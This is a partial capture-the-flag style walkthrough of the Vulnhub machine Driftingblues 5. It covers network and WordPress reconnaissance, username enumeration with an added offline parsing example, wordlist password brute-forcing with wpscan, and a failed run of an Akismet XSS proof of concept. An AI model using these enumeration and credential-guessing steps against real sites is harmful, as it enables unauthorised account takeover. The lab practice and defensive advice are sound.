
Vulnhub: Driftingblues 5 Detailed Walkthrough (Partial)

Posted: 2022-11-20 12:57:13

Driftingblues 5

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.124.0/16   |   Screen View: Unique Hosts                                                                                                                                                            
                                                                                                                                                                                                                                 
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                                                 
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                                
 192.168.56.100  08:00:27:dd:4f:27      1      60  PCS Systemtechnik GmbH                                                                                                                                                        
 192.168.56.194  08:00:27:dc:cc:5b      1      60  PCS Systemtechnik GmbH            

Using netdiscover, which ships with Kali Linux, the target host is identified as 192.168.56.194. The other two entries, 192.168.56.1 and 192.168.56.100, belong to the VirtualBox host-only network itself (the host adapter and its DHCP server), so they are not targets.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.194 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-19 21:06 EST
Nmap scan report for localhost (192.168.56.194)
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.6.2
|_http-title: diary – Just another WordPress site
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:DC:CC:5B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.71 seconds

The Nmap scan shows two open ports on the target: 22 (SSH, OpenSSH 7.9p1 on Debian 10) and 80 (HTTP, Apache 2.4.38 serving WordPress 5.6.2, as the http-generator meta tag reveals).

Get Access

Browsing to port 80 returns a page; it is a WordPress site (title "diary – Just another WordPress site"). There is no robots.txt:

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ curl http://192.168.56.194/robots.txt      
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.194 Port 80</address>
</body></html>

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ nikto -h http://192.168.56.194
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.194
+ Target Hostname:    192.168.56.194
+ Target Port:        80
+ Start Time:         2022-11-19 21:55:46 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.56.194/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2022-11-19 21:56:40 (GMT-5) (54 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 

                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ gobuster dir -u http://192.168.56.194  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.194
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/19 21:57:23 Starting gobuster in directory enumeration mode
===============================================================
/wp-content           (Status: 301) [Size: 321] [--> http://192.168.56.194/wp-content/]
/wp-includes          (Status: 301) [Size: 322] [--> http://192.168.56.194/wp-includes/]
/wp-admin             (Status: 301) [Size: 319] [--> http://192.168.56.194/wp-admin/]
/server-status        (Status: 403) [Size: 279]
Progress: 217863 / 220561 (98.78%)===============================================================
2022/11/19 21:57:54 Finished
===============================================================

Next, scan the site with wpscan to see whether usernames and plugins can be enumerated:

                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ wpscan --url http://192.168.56.194 -e u,p                                            
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.194/ [192.168.56.194]
[+] Started: Sat Nov 19 22:00:12 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.194/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.194/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.194/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.194/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.6.2 identified (Insecure, released on 2021-02-22).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.194/index.php/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>
 |  - http://192.168.56.194/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>

[+] WordPress theme in use: twentytwentyone
 | Location: http://192.168.56.194/wp-content/themes/twentytwentyone/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://192.168.56.194/wp-content/themes/twentytwentyone/readme.txt
 | [!] The version is out of date, the latest version is 1.6
 | Style URL: http://192.168.56.194/wp-content/themes/twentytwentyone/style.css?ver=1.1
 | Style Name: Twenty Twenty-One
 | Style URI: https://wordpress.org/themes/twentytwentyone/
 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.194/wp-content/themes/twentytwentyone/style.css?ver=1.1, Match: 'Version: 1.1'

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] abuzerkomurcu
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.56.194/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] gill
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] collins
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] satanic
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] gadd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Nov 19 22:00:15 2022
[+] Requests Done: 66
[+] Cached Requests: 11
[+] Data Sent: 17.126 KB
[+] Data Received: 672.149 KB
[+] Memory used: 242.973 MB
[+] Elapsed time: 00:00:03

Several usernames were identified. abuzerkomurcu is the author of the published posts and is probably the administrator, so first try cracking his password:
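wpscan found abuzerkomurcu through the public REST users endpoint and the other four through author-ID redirects and the login error messages. As an added example (not wpscan's code and not part of the original write-up), the Python below parses those three signals from constructed sample responses modelled on what WordPress returns; nothing here touches the network, and the sample texts (the JSON body, the Location headers and the login error HTML) are assumptions, not captures from the target.

```python
"""Three WordPress username-enumeration signals, parsed offline.

Added example; the samples below are constructed, modelled on WordPress 5.x
responses, and are not captures from 192.168.56.194.
"""
import json
import re
from typing import Optional

# Constructed: GET /index.php/wp-json/wp/v2/users/?per_page=100 (anonymous REST call)
SAMPLE_WP_JSON = json.dumps([
    {"id": 1, "name": "abuzerkomurcu", "slug": "abuzerkomurcu",
     "link": "http://192.168.56.194/index.php/author/abuzerkomurcu/"},
])

# Constructed: GET /?author=N answers 301 with the author archive in Location;
# a non-existent author ID gets a 404 instead (None here).
SAMPLE_AUTHOR_REDIRECTS = {
    2: "http://192.168.56.194/index.php/author/gill/",
    3: "http://192.168.56.194/index.php/author/collins/",
    9: None,
}

# Constructed: POST /wp-login.php error box; wording modelled on WordPress 5.x.
# The message differs for a known username (bad password) and an unknown one.
SAMPLE_LOGIN_ERRORS = {
    "satanic": ('<div id="login_error"><strong>Error</strong>: The password you entered '
                'for the username <strong>satanic</strong> is incorrect. '
                '<a href="http://192.168.56.194/wp-login.php?action=lostpassword">'
                'Lost your password?</a><br />\n</div>'),
    "nobody": ('<div id="login_error"><strong>Error</strong>: The username '
               '<strong>nobody</strong> is not registered on this site. If you are '
               'unsure of your username, try your email address instead.<br />\n</div>'),
}

AUTHOR_SLUG = re.compile(r"/author/([^/?#]+)/?")


def users_from_wp_json(body: str) -> list:
    """Author slugs from the REST users listing (only users with published posts appear)."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return []
    return [u["slug"] for u in data if isinstance(u, dict) and "slug" in u]


def user_from_author_redirect(location: Optional[str]) -> Optional[str]:
    """Slug from the Location header of a /?author=N redirect, or None."""
    if not location:
        return None
    m = AUTHOR_SLUG.search(location)
    return m.group(1) if m else None


def classify_login_error(html: str) -> str:
    """'valid' if the username exists, 'invalid' if not, 'unknown' otherwise."""
    if "is incorrect" in html:
        return "valid"
    if "is not registered" in html:
        return "invalid"
    return "unknown"


def enumerate_users(wp_json: str, redirects: dict, login_errors: dict) -> dict:
    """Merge the three signals into {username: [sources that confirmed it]}."""
    found = {}
    for slug in users_from_wp_json(wp_json):
        found.setdefault(slug, []).append("wp-json")
    for _author_id, location in sorted(redirects.items()):
        slug = user_from_author_redirect(location)
        if slug:
            found.setdefault(slug, []).append("author-id")
    for name, html in login_errors.items():
        if classify_login_error(html) == "valid":
            found.setdefault(name, []).append("login-error")
    return found


if __name__ == "__main__":
    for user, sources in enumerate_users(SAMPLE_WP_JSON, SAMPLE_AUTHOR_REDIRECTS,
                                         SAMPLE_LOGIN_ERRORS).items():
        print(f"{user}: {', '.join(sources)}")
```

The defensive side of the same three checks: restrict the `wp/v2/users` endpoint to authenticated callers, stop `/?author=N` from redirecting to the author archive, and return one uniform login error so that "bad password" and "no such user" are indistinguishable.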

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ wpscan --url http://192.168.56.194 -U abuzerkomurcu -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.194/ [192.168.56.194]
[+] Started: Sat Nov 19 22:11:19 2022


It ran for a long time without a hit (rockyou has over 14 million entries and every guess is a full POST to wp-login.php), so switch direction and check for plugins, this time with the aggressive detection mode, since the passive check above found none:

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ wpscan --url http://192.168.56.194 --plugins-detection mixed                           
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.194/ [192.168.56.194]
[+] Started: Sat Nov 19 22:31:57 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.194/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.194/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.194/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.194/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.6.2 identified (Insecure, released on 2021-02-22).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.194/index.php/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>
 |  - http://192.168.56.194/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>

[+] WordPress theme in use: twentytwentyone
 | Location: http://192.168.56.194/wp-content/themes/twentytwentyone/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://192.168.56.194/wp-content/themes/twentytwentyone/readme.txt
 | [!] The version is out of date, the latest version is 1.6
 | Style URL: http://192.168.56.194/wp-content/themes/twentytwentyone/style.css?ver=1.1
 | Style Name: Twenty Twenty-One
 | Style URI: https://wordpress.org/themes/twentytwentyone/
 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.194/wp-content/themes/twentytwentyone/style.css?ver=1.1, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:02:07 <=============================================================================================================================================> (100906 / 100906) 100.00% Time: 00:02:07
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.56.194/wp-content/plugins/akismet/
 | Last Updated: 2022-09-28T15:27:00.000Z
 | Readme: http://192.168.56.194/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.0.1
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.194/wp-content/plugins/akismet/, status: 200
 |
 | Version: 4.1.8 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.194/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.56.194/wp-content/plugins/akismet/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <====================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Nov 19 22:34:15 2022
[+] Requests Done: 101080
[+] Cached Requests: 7
[+] Data Sent: 27.034 MB
[+] Data Received: 13.932 MB
[+] Memory used: 523.148 MB
[+] Elapsed time: 00:02:18

The akismet plugin was identified (version 4.1.8, out of date). Check whether there is an exploitable vulnerability for it; the 37902.php PoC below carries the Exploit-DB header pointing at BID 55749:

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ php 37902.php http://192.168.56.194
source: https://www.securityfocus.com/bid/55749/info

The Akismet plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

#!/usr/bin/php -f
PHP Fatal error:  Uncaught Error: Call to undefined function curl_init() in /home/kali/Vulnhub/Driftingblue5/37902.php:19
Stack trace:
#0 {main}
  thrown in /home/kali/Vulnhub/Driftingblue5/37902.php on line 19

The script fails because the php-curl extension is not installed:

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ sudo apt install php-curl                                  
[sudo] password for kali: 
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  libapache2-mod-php libapache2-mod-php8.1 php php-common php-mysql php8.1 php8.1-cli php8.1-common php8.1-curl php8.1-mysql php8.1-opcache php8.1-readline
Suggested packages:
  php-pear
The following NEW packages will be installed:
  php-curl php8.1-curl
The following packages will be upgraded:
  libapache2-mod-php libapache2-mod-php8.1 php php-common php-mysql php8.1 php8.1-cli php8.1-common php8.1-mysql php8.1-opcache php8.1-readline
11 upgraded, 2 newly installed, 0 to remove and 1322 not upgraded.
Need to get 4,556 kB of archives.
After this operation, 153 kB disk space will be freed.
Do you want to continue? [Y/n] y
Get:1 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php-common all 2:92+nmu1 [13.2 kB]
Get:2 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php8.1-readline amd64 8.1.12-1+b1 [12.4 kB]
Get:3 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php8.1-opcache amd64 8.1.12-1+b1 [344 kB]
Get:4 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php8.1-mysql amd64 8.1.12-1+b1 [116 kB]
Get:5 https://mirrors.aliyun.com/kali kali-rolling/main amd64 libapache2-mod-php8.1 amd64 8.1.12-1+b1 [1,639 kB]
Get:6 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php8.1-cli amd64 8.1.12-1+b1 [1,694 kB]
Get:7 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php8.1-common amd64 8.1.12-1+b1 [662 kB]
Get:8 https://mirrors.aliyun.com/kali kali-rolling/main amd64 libapache2-mod-php all 2:8.1+92+nmu1 [3,824 B]
Get:9 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php8.1 all 8.1.12-1 [26.1 kB]
Get:10 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php all 2:8.1+92+nmu1 [3,696 B]
Get:11 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php8.1-curl amd64 8.1.12-1+b1 [34.1 kB]
Get:12 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php-curl all 2:8.1+92+nmu1 [3,720 B]                                                                                                                                 
Get:13 https://mirrors.aliyun.com/kali kali-rolling/main amd64 php-mysql all 2:8.1+92+nmu1 [3,720 B]                                                                                                                                
Fetched 4,556 kB in 13s (352 kB/s)                                                                                                                                                                                                  
(Reading database ... 350461 files and directories currently installed.)
Preparing to unpack .../00-php-common_2%3a92+nmu1_all.deb ...
Unpacking php-common (2:92+nmu1) over (2:92) ...
Preparing to unpack .../01-php8.1-readline_8.1.12-1+b1_amd64.deb ...
Unpacking php8.1-readline (8.1.12-1+b1) over (8.1.5-1+b1) ...
Preparing to unpack .../02-php8.1-opcache_8.1.12-1+b1_amd64.deb ...
Unpacking php8.1-opcache (8.1.12-1+b1) over (8.1.5-1+b1) ...
Preparing to unpack .../03-php8.1-mysql_8.1.12-1+b1_amd64.deb ...
Unpacking php8.1-mysql (8.1.12-1+b1) over (8.1.5-1+b1) ...
Preparing to unpack .../04-libapache2-mod-php8.1_8.1.12-1+b1_amd64.deb ...
Unpacking libapache2-mod-php8.1 (8.1.12-1+b1) over (8.1.5-1+b1) ...
Preparing to unpack .../05-php8.1-cli_8.1.12-1+b1_amd64.deb ...
Unpacking php8.1-cli (8.1.12-1+b1) over (8.1.5-1+b1) ...
Preparing to unpack .../06-php8.1-common_8.1.12-1+b1_amd64.deb ...
Unpacking php8.1-common (8.1.12-1+b1) over (8.1.5-1+b1) ...
Preparing to unpack .../07-libapache2-mod-php_2%3a8.1+92+nmu1_all.deb ...
Unpacking libapache2-mod-php (2:8.1+92+nmu1) over (2:8.1+92) ...
Preparing to unpack .../08-php8.1_8.1.12-1_all.deb ...
Unpacking php8.1 (8.1.12-1) over (8.1.5-1) ...
Preparing to unpack .../09-php_2%3a8.1+92+nmu1_all.deb ...
Unpacking php (2:8.1+92+nmu1) over (2:8.1+92) ...
Selecting previously unselected package php8.1-curl.
Preparing to unpack .../10-php8.1-curl_8.1.12-1+b1_amd64.deb ...
Unpacking php8.1-curl (8.1.12-1+b1) ...
Selecting previously unselected package php-curl.
Preparing to unpack .../11-php-curl_2%3a8.1+92+nmu1_all.deb ...
Unpacking php-curl (2:8.1+92+nmu1) ...
Preparing to unpack .../12-php-mysql_2%3a8.1+92+nmu1_all.deb ...
Unpacking php-mysql (2:8.1+92+nmu1) over (2:8.1+92) ...
Setting up php-common (2:92+nmu1) ...
Setting up php8.1-common (8.1.12-1+b1) ...
Setting up php8.1-curl (8.1.12-1+b1) ...

Creating config file /etc/php/8.1/mods-available/curl.ini with new version
Setting up php8.1-mysql (8.1.12-1+b1) ...
Setting up php8.1-readline (8.1.12-1+b1) ...
Setting up php8.1-opcache (8.1.12-1+b1) ...
Setting up php-curl (2:8.1+92+nmu1) ...
Setting up php-mysql (2:8.1+92+nmu1) ...
Setting up php8.1-cli (8.1.12-1+b1) ...
Setting up libapache2-mod-php8.1 (8.1.12-1+b1) ...
Installing new version of config file /etc/apache2/mods-available/php8.1.conf ...
libapache2-mod-php8.1: not switching MPM - already enabled
Setting up php8.1 (8.1.12-1) ...
Setting up libapache2-mod-php (2:8.1+92+nmu1) ...
Setting up php (2:8.1+92+nmu1) ...
Processing triggers for man-db (2.10.2-1) ...
Processing triggers for kali-menu (2022.3.1) ...
Processing triggers for php8.1-cli (8.1.12-1+b1) ...
Processing triggers for libapache2-mod-php8.1 (8.1.12-1+b1) ...
                                                                                                                                                                                                                                     
┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ php 37902.php 192.168.56.194
source: https://www.securityfocus.com/bid/55749/info

The Akismet plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

#!/usr/bin/php -f
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 127.0.1.1 Port 80</address>
</body></html>
                                                    

This time the script runs, but the target only answers 400 Bad Request, and reading the exploit code more closely shows it was never going to work here: the advisory it implements (BID 55749) describes cross-site scripting in Akismet, which at best runs script in a logged-in user's browser and does not give us access to the server. (Also note the PoC was given a bare IP on the second run instead of the URL used on the first.)

After looking at other people's write-ups, the way in is still cracking a user's password.

The ready-made wordlists do not work; instead, generate a site-specific wordlist with cewl from the blog's own content (the file used below is pass_wordlist), then run it against all five users:

┌──(kali㉿kali)-[~/Vulnhub/Driftingblue5]
└─$ wpscan --url http://192.168.56.194 -P pass_wordlist                   
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.194/ [192.168.56.194]
[+] Started: Sat Nov 19 23:04:32 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.194/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.194/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.194/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.194/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.6.2 identified (Insecure, released on 2021-02-22).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.194/index.php/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>
 |  - http://192.168.56.194/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.6.2</generator>

[+] WordPress theme in use: twentytwentyone
 | Location: http://192.168.56.194/wp-content/themes/twentytwentyone/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://192.168.56.194/wp-content/themes/twentytwentyone/readme.txt
 | [!] The version is out of date, the latest version is 1.6
